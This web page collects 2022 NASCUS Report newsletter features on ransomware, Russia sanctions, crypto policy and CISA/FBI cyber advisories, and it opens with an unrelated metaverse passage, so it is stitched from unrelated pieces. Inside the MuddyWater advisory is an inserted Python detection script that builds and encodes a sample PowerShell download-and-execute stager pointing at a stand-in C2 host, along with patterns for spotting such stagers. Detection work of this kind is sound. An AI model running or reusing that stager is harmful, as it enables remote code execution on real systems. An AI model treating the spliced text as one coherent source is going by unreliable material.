“The internet was described as an ’information superhighway’ in the 90s, but it was more of just a term to refer to a potential future with networked computers rather than an actual highway,” said Timoni West, a vice president who oversees the AR and VR departments at Unity Software, a company that builds graphics engines for game development. “As it develops, the metaverse will also have equivalence to the real world and be much more distributed, democratic, fluid and varied,” she told VICE.

While the discourse on defining the metaverse differs from case to case, it is, in the simplest terms, a shared virtual space that is interactive, immersive and hyper-realistic. It would also include your own customized avatar and digital assets, which will likely be recorded on a blockchain.


So, what is the use of the metaverse, really?

Given its high-value projection, the metaverse is touted as a major player in growing the digital economy. “The metaverse will grow the digital economy, which is the primary growth driver of the world economy,” said Ball.

But while the metaverse is already being seen as the future of entertainment, fashion, gaming and even partying, experts argue that its best-case use will likely be for education. “Just like how you’d understand dissection much better by actually performing it rather than just reading about it, 3D-based education is likely to be much better than, say, schooling over Zoom,” Ball said. Baggili agrees. “Buying virtual countries that don’t exist in the real world could be an investment opportunity for making a quick buck, but the real value of the metaverse is when it’ll be used in ways that bring value to people’s lives [beyond money].”

As an experiment, Baggili taught his students a class on forensics using VR headsets. “It was effective in terms of documenting a crime scene and creating a consistent environment you can save for later. But eventually, even my students’ eyes got tired and it became difficult to work on the computer,” he said. “So while there are scenarios where the technology and implementation can be useful – such as an augmented reality setup to train car mechanics or to help someone remotely fix an elevator they are stuck in – it still needs some work.”


April 15, 2022 Feature: National Meeting for State Regulators


Photos can be downloaded and shared from the photo gallery. A full set of images will be available in next week’s NASCUS Report.


National Meeting Recap

Hosted in sunny San Diego, the National Meeting for State Regulators brought together more than 100 participants from across the country to network, learn and collaborate on the industry’s most pressing issues.


Working Together – Building Relationships

One of the benefits of attending the National Meeting is the ability to network and collaborate with other state agencies across the country. In addition to working within the state system, regulators need to collaborate with federal-level agencies as well. As a result, NCUA Chairman Todd Harper and NCUA Executive Director Larry Fazio participated in two separate sessions focused on building relationships and streamlining collaboration on overlapping priorities. During the three days of discussion, attendees expressed significant concern about two primary areas that affect everyone within the industry: evolving technologies/crypto and cybersecurity/ransomware attacks.

Evolving Technologies

In a world of “crypto-curious” entities (businesses and individuals), state supervisors need to define rapidly evolving technologies and determine the best approaches and regulation practices.

For example, in a presentation by Joseph Vincent, regulators learned about four separate categories of distinction within the digital asset spectrum, from decentralized to centralized. This includes 100% decentralized stablecoins [i.e., Ethereum] in Permissionless Public Shared Networks; to Permissioned, Public Shared Systems, [i.e., Ripple (XRP)]; to Permissioned Private Shared Systems [i.e., JPMorgan Coin]; and the 100% Centralized Ledger System [i.e., Digital Yuan and other Central Bank Digital Currencies].

Members also discussed the impacts, benefits, and challenges associated with Banking as a Service (BaaS) with Dr. Lamont Black. The session included a clarification of terms and applications for this growing sector: “BaaS is a model in which chartered banks or credit unions integrate their digital banking services directly into the products of other non-bank businesses.”

While BaaS benefits include reduced IT costs, improved consumer experiences, and fee-based income, challenges include being characterized as “rent-a-charter” entities and giving consumer relationships to third-party providers – not the credit union. Another vital consideration is that third parties rely on partner financial institutions for regulatory management. Regulators and credit unions need to carefully weigh the implications for Field of Membership, as third-party consumers are not always members of the credit union.

Breaches and Ransomware

“Ransomware-related data breaches have doubled in each of the past two years. At the current growth rate, ransomware attacks will pass phishing as the number one root cause of data compromises in 2022.”

As a result, cybersecurity and ransomware issues are top of mind for most supervisory agencies with some stating a ransomware attack would be their “worst nightmare.” Particularly with the heightened tensions around Ukraine, agencies are closely examining the cybersecurity landscape, including changes to cybersecurity reporting rules. At the current time, only a handful of agencies have dedicated cyber experts, while others are in the process of securing a dedicated position.

With the average ransomware payment nearing $350K, NASCUS brought in speakers CUNA Mutual Group’s Carlos Molina and Derek Laczniak, Director of Cyber Liability, M3 Insurance, to discuss the effects of ransomware on the industry. One of the most compelling segments of the presentation covered a “checklist of things to know” when responding to a ransomware attack. This includes:

  1. Know who is on your incident response team.
  2. Have multiple forms of communication available.
  3. Be prepared to make decisions about voluntarily taking systems offline.
  4. Be prepared with an internal communication plan.
  5. Do not allow employees to reach out to the threat actor themselves.
  6. You’ll be asked to sign two agreement letters within the first 24 hours.
  7. You do not need to have your own cryptocurrency on hand.
  8. You need underwriting approval to pay a ransom.
  9. Know your backups and understand that they are not always the answer.
  10. Think about whom the organization needs to tell and when.

Additionally, state supervisors discussed in-depth perspectives on the following:

  • The need to retain, recruit, and replenish staff. With unemployment levels low in many states and the complication of virtual workplace demands from potential recruits, agencies struggle to be competitive and hire talented staff. This experience is common throughout the industry; as more and more Baby Boomers reach retirement, agencies are working to fill the shoes of seasoned staff in hybrid workplaces.
  • Challenges within the real estate market. The pandemic has altered how employees view the modern workspace, and many employees are moving out of city centers, requiring companies to rethink commercial space needs as part of their cost-benefit analysis. Additionally, some expressed concerns over a potential housing bubble given market changes spurred by the pandemic.
  • A rise in credit union mergers. Succession plan issues have been a strong driver for mergers in several states, with ‘one in three credit unions citing a lack of a succession plan’ as the main reason driving a merger.
  • Wide spectrum of overlapping topics. The regulatory world is a complex environment and the National Meeting provided a platform for synergy on field of membership reform, interstate branching, CUSO advancements in FinTechs, and more.

Looking Ahead

As we move into the future, attendees noted sensitivities to other potential bubbles, including delinquencies. While delinquencies have been flat throughout the pandemic, supervisors are concerned with credit quality, student and auto loans, in addition to net-worth ratios.

Events such as these are essential to the state system, as they provide a stage for discovery, extensive issue remediation, and collaboration. NASCUS offers several more collaborative learning opportunities, including the 2022 Cannabis Symposium, S3: State System Summit, Directors’ Colleges, and more.



April 8, 2022, Feature: A Rousing Week at Treasury

This week, Secretary of the Treasury Janet L. Yellen testified before the U.S. House Financial Services Committee to “discuss Treasury’s oversight of the International Financial Institutions (IFIs) and our role in promoting inclusive and sustainable growth, global monetary and financial stability, and development.” In the same week, Treasury escalated sanctions on Russia, including the Russia-based Hydra, the world’s largest darknet market, and the ransomware-enabling virtual currency exchange Garantex, and made an official statement on potential policies and regulations around digital assets.

On Tuesday, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned the world’s largest and most prominent darknet market, Hydra Market (Hydra), in a coordinated international effort to disrupt the proliferation of malicious cybercrime services, dangerous drugs, and other illegal offerings available through the Russia-based site. The operation targeting Hydra was a collaborative initiative joined by the U.S. Department of Justice, Federal Bureau of Investigation, Drug Enforcement Administration, Internal Revenue Service Criminal Investigation, and Homeland Security Investigations. This action was enhanced by international cooperation with the German Federal Criminal Police, who that day shut down Hydra servers in Germany and seized $25 million worth of bitcoin.

By Wednesday, Treasury had escalated the sanctions, targeting critical arteries of the Russian Federation economy, fully blocking the largest public and private banks, and imposing new sanctions on Putin’s family and the architects of the war in response to Russia’s continued brutal war against Ukraine and atrocities against Ukrainian citizens. Treasury imposed full blocking sanctions on Sberbank, Russia’s largest state-owned bank, and Alfa-Bank, Russia’s largest private bank. Treasury also targeted family members of President Vladimir Putin (Putin) and Foreign Minister Sergey Lavrov (Lavrov), as well as Russian Security Council members who are complicit in the war against Ukraine.

Then, in remarks delivered Thursday at American University’s Kogod School of Business Center for Innovation, Secretary Yellen closed out a busy week with a statement on digital asset policy, saying that crypto-asset regulation should support responsible innovation while managing risks.

Yellen commented that in many cases regulators already have authorities that can manage crypto risks and provide appropriate oversight of new types of intermediaries such as digital asset exchanges. “Our regulatory frameworks should be designed to support responsible innovation while managing risks – especially those that could disrupt the financial system and economy,” Yellen commented.

“As banks and other traditional financial firms become more involved in digital asset markets, regulatory frameworks will need to appropriately reflect the risks of these new activities,” she said.

Within her remarks, Yellen shared five lessons to apply when navigating the challenges and opportunities associated with emerging technologies.

1. Our financial system benefits from responsible innovation
Although new technologies have made our financial system more efficient for most Americans, many transactions still take too long to settle. A combination of technological factors and business incentives has produced a common frustrating experience shared by tens of millions of Americans every week: their employer sends their paycheck, but it takes up to two days for the check to hit their bank account.

Proponents of digital assets envision a more efficient payment system with instantaneous transactions and lower costs no matter where you live. Under the Executive Order, the Administration will publish a report on the future of money and payments. The report will analyze possible design choices related to a potential Central Bank Digital Currency (CBDC) and implications for payment systems, economic growth, financial stability, financial inclusion, and national security.

2. When regulation fails to keep pace with innovation, vulnerable people often suffer the greatest harm
We learned this painful lesson during the Global Financial Crisis. Financial institutions called “shadow banks” and an explosion of new financial products allowed dangerous levels of risks to accumulate. Stablecoins raise policy concerns, including those related to illicit finance, user protection, and systemic risk. And, they are currently subject to inconsistent and fragmented oversight.

Of course, stablecoins are just one piece of a much larger ecosystem of digital assets. Our regulatory frameworks should be designed to support responsible innovation while managing risks – especially those that could disrupt the financial system and economy. As banks and other traditional financial firms become more involved in digital asset markets, regulatory frameworks will need to appropriately reflect the risks of these new activities. And, new types of intermediaries, such as digital asset exchanges and other digital native intermediaries, should be subject to appropriate forms of oversight.

3. Regulation should be based on risks and activities, not specific technologies
When new technologies enable new activities, products, and services, financial regulations need to adjust. But, that process should be guided by the risks associated with the services provided to households and businesses, not the underlying technology.

Wherever possible, regulation should be “tech neutral.” For example, consumers, investors, and businesses should be protected from fraud and misleading statements regardless of whether assets are stored on a balance sheet or distributed ledger. Similarly, firms that hold customer assets should be required to ensure those assets are not lost, stolen, or used without the customer’s permission. And, taxpayers should receive the same type of tax reporting on digital asset transactions that they receive for transactions in stocks and bonds, so that they have the information they need to report their income to the IRS.

To the extent there are gaps, we will make policy recommendations, including assessment of potential regulatory actions and legislative changes. Continuing to update and improve our regulatory architecture will support US economic competitiveness and reinforce leadership in the global financial system.

4. Sovereign money is the core of a well-functioning financial system and the US benefits from the central role the dollar and US financial institutions play in global finance
The development of our currency to its current form has been a dynamic process that took place over centuries. Today, monetary sovereignty and uniform currency have brought clear benefits for economic growth and stability. Our approach to digital assets must be guided by the appreciation of those benefits. Some have suggested a CBDC could be the next evolution in our currency. We need to consider these important questions in the context of the central role the dollar plays in the world economy.

The dollar’s international prominence is strongly supported by US institutions and policies; US economic performance; open, deep and liquid financial markets; rule of law; and a commitment to a free-floating currency. The President’s Executive Order asks us to consider whether and how the issuance of a public CBDC would support this role…I don’t yet know the conclusions we will reach, but we must be clear that issuing a CBDC would likely present a major design and engineering challenge that would require years of development, not months.

As we consider these big choices, we must also remember that technology-driven financial innovation is inherently cross-border and requires international cooperation.

5. We need to work together to ensure responsible innovation
Many of the most groundbreaking innovations in our history have involved all of us: policymakers and businesspeople, advocates, scholars, inventors, and citizens. People have a wide range of views when it comes to digital assets. On one hand, some proponents speak as if the technology is so radically and beneficially transformative that the government should step back completely and let innovation take its course. On the other hand, skeptics see limited, if any, value in this technology and associated products and advocate that the government take a much more restrictive approach. Such divergence of perspectives has often been associated with new and transformative technologies.



March 25, 2022, Feature: How Are State Agencies Preparing in the Cyber Space?

This week, the White House issued a fact sheet regarding potential cyberattacks resulting from “evolving intelligence” around the Russia/Ukraine situation. Additionally, the President echoed concerns regarding the potential for Russian cyberattacks and directed companies to “harden your cyber defenses immediately.”

This step follows proactive actions by several Governors across the country to safeguard against potential attacks, including:

  • New York Gov. Kathy Hochul commented that her state was “on heightened alert with respect to cybersecurity and our own defenses.” Additionally, New York launched a Joint Security Operations Center to improve coordination and bolster cybersecurity efforts by bringing together federal, state, county, and local governments with critical infrastructure partners.
  • Colorado Gov. Jared Polis, through an executive order, directed the Office of Information Technology to focus on protecting the state’s critical infrastructure from Russian cyberattacks or misinformation efforts.
  • North Carolina Gov. Roy Cooper instructed the Joint Cybersecurity Task Force to increase outreach and assistance.
  • Texas Gov. Greg Abbott ordered state IT and public safety officials to “make sure cyber incident response teams are ready and that a potential cyber intrusion can be quickly detected through antivirus and other software.”
  • In an interview with Stateline, Connecticut Chief Information Security Officer Jeff Brown commented that the state has been “very aggressively” blocking Russian IP addresses.

While state governments have not received any credible threats to date, state executives are focused on ensuring proper procedures to protect state systems and the public.

From a recent article by The Pew Charitable Trusts titled “Ukraine War Puts US Cities, States on Cyber Alert”:

“Since Russia’s attack on Ukraine, the Multi-State Information Sharing and Analysis Center, a federally funded group that helps state and local governments prevent and respond to digital threats, also has boosted its efforts, said Randy Rose, a senior director. The group sent information to every state about ways to take defensive actions.

But states shouldn’t just focus on Russia, Rose noted, because other cybercriminals and “state actors” may attempt to take advantage of the increased focus on Russia “to slip in unnoticed.””


What Can You Do Today?

Together, the FBI and the Cybersecurity and Infrastructure Security Agency issued a joint Cybersecurity Advisory that provides information on the malware “as well as open-source indicators of compromise (IOCs) for organizations to detect and prevent the malware.”

Actions to Take Today:

  • Set antivirus and antimalware programs to conduct regular scans.
  • Enable strong spam filters to prevent phishing emails from reaching end users.
  • Filter network traffic.
  • Update software.
  • Require multifactor authentication.

Furthermore, the U.S. Cybersecurity and Infrastructure Security Agency has issued a “Shields Up” warning about this evolving threat. It advises every organization, including state and local governments, to “adopt a heightened posture” and be prepared to respond to disruptive cyber activity.


NASCUS Report March 4, 2022, Feature: Global Cybersecurity Awareness

This feature highlights cyber alerts and awareness resources as the entire cybersecurity community is on high alert following events in Ukraine. Items curated for this week include:


CISA and FBI Publish Advisory to Protect Organizations from Destructive Malware Used in Ukraine

February 26, 2022 — The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint Cybersecurity Advisory today providing an overview of destructive malware that has been used to target organizations in Ukraine as well as guidance on how organizations can detect and protect their networks. The joint Advisory, “Destructive Malware Targeting Organizations in Ukraine,” provides information on WhisperGate and HermeticWiper malware, both used to target organizations in Ukraine.

Destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data. While there is no specific, credible threat to the United States at this time, all organizations should assess and bolster their cybersecurity. Some immediate actions that can be taken to strengthen cyber posture include:

  • Enable multifactor authentication;
  • Set antivirus and antimalware programs to conduct regular scans;
  • Enable strong spam filters to prevent phishing emails from reaching end users;
  • Update software; and
  • Filter network traffic.

“In the wake of continued denial of service and destructive malware attacks affecting Ukraine and other countries in the region, CISA has been working hand-in-hand with our partners to identify and rapidly share information about malware that could threaten the operations of critical infrastructure here in the U.S.,” said CISA Director Jen Easterly. “Our public and private sector partners in the Joint Cyber Defense Collaborative (JCDC), international computer emergency readiness team (CERT) partners, and our long-time friends at the FBI are all working together to help organizations reduce their cyber risk.”

“The FBI alongside our federal partners continues to see malicious cyber activity that is targeting our critical infrastructure sector,” said FBI Cyber Division Assistant Director Bryan Vorndran. “We are striving to disrupt and diminish these threats; however, we cannot do this alone. We continue to share information with our public and private sector partners and encourage them to report any suspicious activity. We ask that organizations continue to shore up their systems to prevent any increased impediment in the event of an incident.”

Read more about this advisory here.

Related Article: CISA Adds 95 Known Exploited Vulnerabilities to Catalog
Based on the evidence of active exploitation, these types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose a significant risk to the federal enterprise.


Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks

February 24, 2022 — The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. Note: MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.

MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[1] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.

MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their malicious activity.
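The obfuscated-PowerShell tradecraft mentioned above is the one piece of this advisory a defender can test against their own telemetry without any actor-specific indicators. The script below is an added example written for this page, not tooling from the advisory or from CISA/FBI: it tokenizes PowerShell process-creation events, decodes any -EncodedCommand payload (base64 over UTF-16LE), and scores the launch on the switches, script patterns and parent process that scripted stagers typically combine. The sample events, host names, stager string, parent-process list and indicator weights are all constructed or assumed for illustration.

```python
"""Decode and score obfuscated PowerShell in process-creation events.

Added example for this page; not code from the CISA/FBI/CNMF/NCSC-UK advisory.
The events, hosts, stager string, parent-process list and weights below are
constructed/assumed for illustration.
"""
import base64
import binascii
import re

# Command-line switches typical of scripted droppers (abbreviations that
# powershell.exe accepts). Values are the indicator names reported.
SWITCHES = {
    "-nop": "NoProfile", "-noprofile": "NoProfile",
    "-noni": "NonInteractive", "-noninteractive": "NonInteractive",
    "-ep": "ExecutionPolicy", "-exec": "ExecutionPolicy", "-executionpolicy": "ExecutionPolicy",
}
# Patterns in the decoded script that stage a download-and-execute or C2 loop.
SCRIPT_INDICATORS = [
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("download-cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)),
    ("nested-base64", re.compile(r"frombase64string", re.I)),
]
# Assumed: parents that should rarely spawn PowerShell on a workstation.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "mshta.exe",
                      "wscript.exe", "cscript.exe", "rundll32.exe"}
# Assumed weights; any indicator not listed counts 1.
WEIGHTS = {"EncodedCommand": 3, "EncodedCommand(undecodable)": 3, "suspicious-parent": 3,
           "download-cradle": 3, "invoke-expression": 2, "nested-base64": 2}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # keep quoted arguments together as one token


def encode_for_powershell(script):
    """What -EncodedCommand expects: base64 over the UTF-16LE form of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Inverse of the above; None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def is_encoded_switch(token):
    """True for every spelling powershell.exe accepts for -EncodedCommand
    (-e, -ec, -enc, -encoded, ..., and the same with a leading slash)."""
    t = token.lower()
    if len(t) < 2 or t[0] not in "-/":
        return False
    body = t[1:]
    return body == "ec" or "encodedcommand".startswith(body)


def analyze_cmdline(cmdline):
    """Return the indicators found in one PowerShell command line plus the decoded script."""
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    indicators, decoded = [], None
    for i, tok in enumerate(tokens):
        low = tok.lower()
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if low in SWITCHES:
            indicators.append(SWITCHES[low])
        elif low in ("-w", "-windowstyle") and nxt == "hidden":
            indicators.append("HiddenWindow")
        elif is_encoded_switch(tok) and nxt:
            decoded = decode_encoded_command(tokens[i + 1])
            indicators.append("EncodedCommand" if decoded is not None
                              else "EncodedCommand(undecodable)")
    for name, pattern in SCRIPT_INDICATORS:
        if decoded is not None and pattern.search(decoded):
            indicators.append(name)
    return {"indicators": indicators, "decoded": decoded}


def scan_events(events, threshold=4):
    """Score each PowerShell launch; return the ones at or above the threshold."""
    findings = []
    for ev in events:
        if ev["image"].lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        result = analyze_cmdline(ev["cmdline"])
        if ev["parent"].lower() in SUSPICIOUS_PARENTS:
            result["indicators"].append("suspicious-parent")
        result["score"] = sum(WEIGHTS.get(name, 1) for name in result["indicators"])
        if result["score"] >= threshold:
            findings.append({"host": ev["host"], **result})
    return findings


# Constructed sample telemetry (not real MuddyWater data); the URL uses the reserved .invalid TLD.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_for_powershell(STAGER)},
    {"host": "srv02", "parent": "services.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"host": "ws07", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -e " + encode_for_powershell(STAGER)[:-5]},
    {"host": "ws07", "parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['host']}: score={f['score']} indicators={f['indicators']}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Run as a script, it reports the Word-spawned encoded stager on ws01 with its decoded download cradle, and the truncated blob on ws07 as an undecodable encoded command, while the scheduled inventory script on srv02 stays below the threshold. A truncated or otherwise undecodable blob is still reported, because an analyst wants to see encoded launches that the decoder cannot read rather than have them silently dropped.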

This advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks.

FBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. Note: also see the Additional Resources section.

Click here for a PDF version of this report.


Related Article: NCUA’s Information Security Examination and Cybersecurity Assessment Program
Includes cyber-based resources such as an automated Cybersecurity toolbox, an examiner’s guide, the National Supervision Policy Manual, and FFIEC IT Booklets.

February 25, 2022, Featured Story:

CISA Releases New Insight to Help Critical Infrastructure Owners Prepare for and Mitigate Foreign Influence Operations

February 18, 2022: The Cybersecurity and Infrastructure Security Agency (CISA) released a new CISA Insight today, Preparing for and Mitigating Foreign Influence Operations Targeting Critical Infrastructure, which provides critical infrastructure owners and operators with guidance on how to identify and mitigate the risks of influence operations that use mis-, dis-, and malinformation (MDM) narratives.

Recently observed foreign influence operations abroad demonstrate that foreign governments and actors can quickly employ sophisticated influence techniques to target American audiences with the goal of disrupting U.S. critical infrastructure and undermining U.S. interests. This CISA Insight is intended to raise awareness amongst critical infrastructure owners and operators on the risks of such influence operations. The document also outlines steps organizations can take to mitigate the effects of MDM, such as ensuring swift coordination in information sharing and communicating accurate and trusted information to bolster resilience.

“We need to be prepared for the potential of foreign influence operations to negatively impact various aspects of our critical infrastructure with the ongoing Russia-Ukraine geopolitical tensions,” said CISA Director Jen Easterly. “We encourage leaders at every organization to take proactive steps to assess their risks from information manipulation and mitigate the impact of potential foreign influence operations.”

CISA encourages all critical infrastructure owners to identify vulnerabilities, educate staff on proper cyber hygiene, and implement an MDM incident response plan:

  • Designate an individual to oversee the MDM incident response process and associated crisis communications.
  • Establish roles and responsibilities for MDM response, including but not limited to responding to media inquiries, issuing public statements, communicating with your staff, and engaging your stakeholder network.
  • Ensure your communication systems are set up to handle incoming questions. Phones, social media accounts, and centralized inboxes should be monitored by multiple people on a rotating schedule to avoid burnout.
  • Identify and train staff on reporting procedures to social media companies, government, and/or law enforcement.
  • Consider your internal coordination channels and processes for identifying incidents, delineating information sharing and response. Foreign actors can combine influence operations with cyber activities, requiring additional coordination to facilitate a whole-of-organization response.

View the CISA Insight here.

Additional Resource: CISA Launches New Catalog of Free Public and Private Sector Cybersecurity Services 

Related Articles


Featured Article in the February 18, 2022 Issue

CISA Issues “Shields Up” Hacking Alert 

February 16, 2022 — Cyber threats are an issue that every organization faces, from governmental to non-profit and service organizations across the country. Hacking incidents can disrupt company operations, public safety, and essential services, and expose private data. As such, CISA recommends organizations of all sizes “adopt a heightened posture when it comes to cybersecurity and protecting their most critical assets.”

At this time, CISA is monitoring cyber threats associated with the Russian invasion of Ukraine. “While there are not currently any specific credible threats to the U.S. homeland, we are mindful of the potential for the Russian government to consider escalating its destabilizing actions in ways that may impact others outside of Ukraine.”

Based on this situation, CISA recommends all organizations adopt the following actions:

Reduce the likelihood of a damaging cyber intrusion

  • Validate that all remote access to the organization’s network and privileged or administrative access requires multi-factor authentication.
  • Ensure that software is up to date, prioritizing updates that address known exploited vulnerabilities identified by CISA.
  • Confirm that the organization’s IT personnel have disabled all ports and protocols that are not essential for business purposes.
  • If the organization is using cloud services, ensure that IT personnel have reviewed and implemented strong controls outlined in CISA’s guidance.
  • Sign up for CISA’s free cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats.

Take steps to quickly detect a potential intrusion

  • Ensure that cybersecurity/IT personnel are focused on identifying and quickly assessing any unexpected or unusual network behavior. Enable logging in order to better investigate issues or events.
  • Confirm that the organization’s entire network is protected by antivirus/antimalware software and that signatures in these tools are updated.
  • If working with Ukrainian organizations, take extra care to monitor, inspect, and isolate traffic from those organizations; closely review access controls for that traffic.

Ensure that the organization is prepared to respond if an intrusion occurs

  • Designate a crisis-response team with main points of contact for a suspected cybersecurity incident and roles/responsibilities within the organization, including technology, communications, legal, and business continuity.
  • Assure availability of key personnel; identify means to provide surge support for responding to an incident.
  • Conduct a tabletop exercise to ensure that all participants understand their roles during an incident.

Maximize the organization’s resilience to a destructive cyber incident

  • Test backup procedures to ensure that critical data can be rapidly restored if the organization is impacted by ransomware or a destructive cyberattack; ensure that backups are isolated from network connections.
  • If using industrial control systems or operational technology, conduct a test of manual controls to ensure that critical functions remain operable if the organization’s network is unavailable or untrusted.

By implementing the steps above, all organizations can make near-term progress toward improving cybersecurity and resilience. In addition, while recent cyber incidents have not been attributed to specific actors, CISA urges cybersecurity/IT personnel at every organization to review Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure. CISA also recommends organizations visit StopRansomware.gov, a centralized, whole-of-government webpage providing ransomware resources and alerts.


For additional information and resources, click here to visit the Cyber section of NASCUS.org.

Click here to read last week’s feature article on: Appraisal Undervaluations